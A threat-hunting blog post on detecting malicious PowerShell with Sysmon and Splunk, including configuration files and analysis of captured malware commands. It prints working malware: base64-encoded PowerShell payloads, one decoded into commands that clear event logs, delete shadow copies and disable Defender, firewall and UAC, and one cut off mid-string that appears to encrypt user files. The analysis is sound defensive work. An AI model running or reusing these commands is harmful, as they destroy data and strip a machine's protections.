Sysmon is a monitoring tool which combined with Splunk makes an excellent tandem for threat hunting. A good example was presented by Tom Ueltschi at Botconf 2016.
Windows PowerShell is a command shell very useful for administrative purpose, but at the same time can be abused across different phases of an intrusion and it is being actively used by malware developers. For these reasons, I'm interesting in hunting, using Sysmon and Splunk, when PowerShell is used for bad purposes. The setup is very simple: Windows Machine(s) with Splunk Forwader and Sysmon. The two necessary files to configured are inputs.conf and config.xml.
A simple inputs.conf file in the forwarder is the following:
C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default\inputs.conf
# Version 6.4.5
# these here just override and disable stuff that in system/default.
################################
# Data thru parsingQueue always
################################
[splunktcp]
route=has_key:tautology:parsingQueue;absent_key:tautology:parsingQueue
################################
# Make sure these get forwarded
################################
[monitor://$SPLUNK_HOME\var\log\splunk\splunkd.log]
_TCP_ROUTING = *
index = _internal
[monitor://$SPLUNK_HOME\var\log\splunk\metrics.log]
_TCP_ROUTING = *
index = _internal
[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = false
renderXml = true
Regarding the config.xml file for sysmon, it is key to customise the file for each specific environment in order to reduce the noise and catch all the interesting events. In my case, I have used a very simple one which works for my test environment and doesn't create much noise. A more advance template to use is the one created by @SwiftOnSecurity.
<Sysmon schemaversion="3.2">
<HashAlgorithms>MD5</HashAlgorithms>
<EventFiltering>
<!-- Log all drivers except if the signature -->
<!-- contains Microsoft or Windows -->
<DriverLoad onmatch="exclude">
<Signature condition="contains">microsoft</Signature>
<Signature condition="contains">windows</Signature>
</DriverLoad>
<NetworkConnect onmatch="include">
<DestinationPort>443</DestinationPort>
<DestinationPort>80</DestinationPort>
</NetworkConnect>
<!-- Exclude certain processes that cause high event volumes -->
<ProcessCreate onmatch="exclude">
<Image condition="contains">splunk</Image>
<Image condition="contains">streamfwd</Image>
<Image condition="contains">splunkd</Image>
<Image condition="contains">splunkD</Image>
<Image condition="contains">splunk</Image>
<Image condition="contains">splunk-optimize</Image>
<Image condition="contains">splunk-MonitorNoHandle</Image>
<Image condition="contains">splunk-admon</Image>
<Image condition="contains">splunk-netmon</Image>
<Image condition="contains">splunk-regmon</Image>
<Image condition="contains">splunk-winprintmon</Image>
<Image condition="contains">btool</Image>
<Image condition="contains">PYTHON</Image>
</ProcessCreate>
<ProcessTerminate onmatch="exclude">
<Image condition="contains">splunk</Image>
<Image condition="contains">streamfwd</Image>
<Image condition="contains">splunkd</Image>
<Image condition="contains">splunkD</Image>
<Image condition="contains">splunk</Image>
<Image condition="contains">splunk-optimize</Image>
<Image condition="contains">splunk-MonitorNoHandle</Image>
<Image condition="contains">splunk-admon</Image>
<Image condition="contains">splunk-netmon</Image>
<Image condition="contains">splunk-regmon</Image>
<Image condition="contains">splunk-winprintmon</Image>
<Image condition="contains">btool</Image>
<Image condition="contains">PYTHON</Image>
</ProcessTerminate>
<FileCreateTime onmatch="exclude">
<Image condition="contains">splunk</Image>
<Image condition="contains">streamfwd</Image>
<Image condition="contains">splunkd</Image>
<Image condition="contains">splunkD</Image>
<Image condition="contains">splunk</Image>
<Image condition="contains">splunk-optimize</Image>
<Image condition="contains">splunk-MonitorNoHandle</Image>
<Image condition="contains">splunk-admon</Image>
<Image condition="contains">splunk-netmon</Image>
<Image condition="contains">splunk-regmon</Image>
<Image condition="contains">splunk-winprintmon</Image>
<Image condition="contains">btool</Image>
<Image condition="contains">PYTHON</Image>
</FileCreateTime>
</EventFiltering>
</Sysmon>
As I said, I'm interested in any PowerShell command spawned and the parent process associated. With a simple SPL query I get straight forward all the PowerShell commands executed, as showed below
Let's analyse each of the executed PowerShell commands from the screenshot above
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar
This command is using the 'ExecutionPolicy bypass' option. According to some documentation the PowerShell Execution Policy was not designed as security control, but as a control to limit mistakes done by sysadmins. https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In any case, any PowerShell command using that option should be consider suspicious.
It also runs with the option "windowstyle hidden" to hide the prompt. Although this is a not bad indicator 'per se' and some valid scripts can run in the background with this option, this indicator together with any additional other indicator should raise an alert.
In the command above there is another suspicious thing: the 'rar' extension of the file executed by the PowerShell. Looking to any process launched by that Command, as ParentComandLine, I get the following:
So basically, I see that the PowerShell command invokes a cmd.exe to execute the 'rar' file, which means it is not a compress 'rar' file. Following the flow I see that SafetyTest.rar invokes another command: "C:\Users\angel\AppData\Local\Temp\Trojan.exe"
netsh firewall add allowedprogram "C:\Users\angel\AppData\Local\Temp\Trojan.exe" "Trojan.exe" ENABLE
Trojan.exe creates a rule in the firewall to allow itself in the firewall, very very suspicious activity and further investigation should be done in that system.
Continuing with the other PowerShell commands, I see there are several base64 encoded PowerShell commands. I consider any encoded command suspicious and needs to be investigated on account that the embebed encoded command can be anything
powershell -win hidden -enc
dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewANAAoAdwBlAHYAdAB1AHQAaQBsACAAZQBsACAAfAAgAEYAbwByAGUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAdwBlAHYAdAB1AHQAaQBsACAAYwBsACAAIgAkAF8AIgB9AA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAiACAALwB2ACAARABpAHMAYQBiAGwAZQBDAE0ARAAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMgAgAC8AZgANAAoAUgBFAEcAIABBAEQARAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABFAG4AYQBiAGwAZQBMAFUAQQAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAVgBTAFMAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFYAUwBTACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBjADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBkADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBlADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBmADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBnADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB4ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB5ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB6ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQADQAKAG4AZQB0AHMAaAAgAGEAZAB2AGYAaQByAGUAdwBhAGwAbAAgAHMAZQB0ACAAYQBsAGwAcAByAG8AZgBpAGwAZQBzACAAcwB0AGEAdABlACAAbwBmAGYADQAKAHMAYwAgAGMAbwBuAGYAaQBnACAAdwBzAGMAcwB2AGMAIABzAHQAYQByAHQAPQAgAGQAaQBzAGEAYgBsAGUAZAANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADEAIAAvAGYADQAKAG4AZQB0ACAAcwB0AG8AcAAgAFcAaQBuAEQAZQBmAGUAbgBkADsAIABzAGMAIABjAG8AbgBmAGkAZwAgAFcAaQBuAEQAZQBmAGUAbgBkAD0AIABkAGkAcwBhAGIAbABlAGQAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFcAaQBuAEQAZQBmAGUAbgBkACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIgAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmADsAIABzAGMAIABkAGUAbABlAHQAZQAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsATABNAFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgA7ACAAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEgAbwBzAHQAIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAdwB1AGEAdQBzAGUAcgB2AA0ACgBOAGUAdAAgAHUAcwBlAHIAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFACAALwBhAGMAdABpAHYAZQA6AG4AbwANAAoAIwBZAEMAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAbABzAGEAcwBzACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHMAbQBzAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAYwBvAG4AaABvAHMAdAAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABkAHcAbQAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHYAYwBoAG8AcwB0ACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAGUAeABwAGwAbwByAGUAcgAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHQAZQBhAG0AIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAHsAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAoAHgAOAA2ACkAfQAgACsAIAAiAFwAUwB0AGUAYQBtACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAGsAeQBwAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAUwBrAHkAcABlACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIAB0AHMAMwBjAGwAaQBlAG4AdABfAHcAaQBuADYANAAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACIAXABUAFMAMwBDAGwAaQBlAG4AdAAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALwB2ACAATgBvAEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoAFsAZQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AGcAZQB0AGYAbwBsAGQAZQByAHAAYQB0AGgAKAAiAEQAZQBzAGsAdABvAHAAIgApACAAKwAgACIAXAAqAC4AKgAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAIgBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAZQBzAGsAdABvAHAAXAAqAC4AKgAiACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUADQAKAFIARQBHACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC8AdgAgAE4AbwBSAHUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMQAgAC8AZgANAAoAIwBaAEEAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAASQBFAHgAcABsAG8AcgBlACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUwB0AGUAYQBtACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFMAawB5AHAAZQAgAC0ARgBvAHIAYwBlAA0ACgAjAFoARABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABDAGgAcgBvAG0AZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABGAGkAcgBlAGYAbwB4ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHQAcwAzAGMAbABpAGUAbgB0AF8AdwBpAG4ANgA0ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE8AcgBpAGcAaQBuACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFcAbwByAGQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAARQB4AGMAZQBsACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFAAbwB3AGUAcgBwAG8AaQBuAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUABpAGQAZwBpAG4AIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAATwBwAGUAcgBhACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAEMAeQBiAGUAcgBHAGgAbwBzAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMASABlAGwAcABlAHIAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBQAG8AZABTAGUAcgB2AGkAYwBlACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHYAbABjACAALQBGAG8AcgBjAGUADQAKAH0A
The command, when decoded, contains the following set of commands:
while($true){
wevtutil el | Foreach-Object {wevtutil cl "$_"}
REG add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
net stop VSS; REG add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet
netsh advfirewall set allprofiles state off
sc config wscsvc start= disabled
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
net stop WinDefend; sc config WinDefend= disabled; REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f; REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend
REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f; REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableSmartScreen /t REG_DWORD /d 0 /f
net stop wuauserv
Net user $env:USERNAME /active:no
#YCkill -processname lsass -Force; kill -processname smss -Force; kill -processname conhost -Force; kill -processname dwm -Force; kill -processname svchost -Force; kill -processname explorer -Force
kill -processname steam -Force; Remove-Item (${env:ProgramFiles(x86)} + "\Steam") -Recurse -Force
kill -processname skype -Force; Remove-Item ($env:APPDATA + "\Skype") -Recurse -Force
kill -processname ts3client_win64 -Force; Remove-Item ($env:APPDATA + "\TS3Client") -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
Remove-Item ([environment]::getfolderpath("Desktop") + "\*.*") -Recurse -Force; Remove-Item "C:\Users\Public\Desktop\*.*" -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
#ZAkill -processname IExplore -Force; kill -processname MicrosoftEdge -Force
kill -processname Steam -Force
kill -processname Skype -Force
#ZDkill -processname Chrome -Force
kill -processname Firefox -Force
kill -processname ts3client_win64 -Force
kill -processname Origin -Force
kill -processname Word -Force
kill -processname Excel -Force
kill -processname Powerpoint -Force
kill -processname Pidgin -Force
kill -processname Opera -Force
kill -processname CyberGhost -Force
kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force
kill -processname vlc -Force
Lot of things going on here; modification of registry keys, stopping services, delete shadow copies, disabling firewall, disable the security service center, stopping and disabling AntiVirus (Bit defender), kill several processes, etc.
powershell -win hidden -enc JABwAGEAcwBzAD0AKAAnAEkAdwBCAEgAQQBHADgAQQBOAHcAQgBTAEEARABjAEEAYwBBAEIAbABBAEcAUQBBAFEAZwBCADUAQQBIAGMAQQBZAFEAQgA2AEEARwBrAEEAZQBBAEEAagBBAEEAPQA9ACcAKQANAAoAJABkAHIAaQB2AGUAcwAgAD0AIAA2ADUALgAuADkAMAAgAHwAIABmAG8AcgBlAGEAYwBoACAAewBbAGMAaABhAHIAXQAkAF8AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AagBwAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGoAcABlAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjAHgAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwB4ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABwAHQAIgApACkAe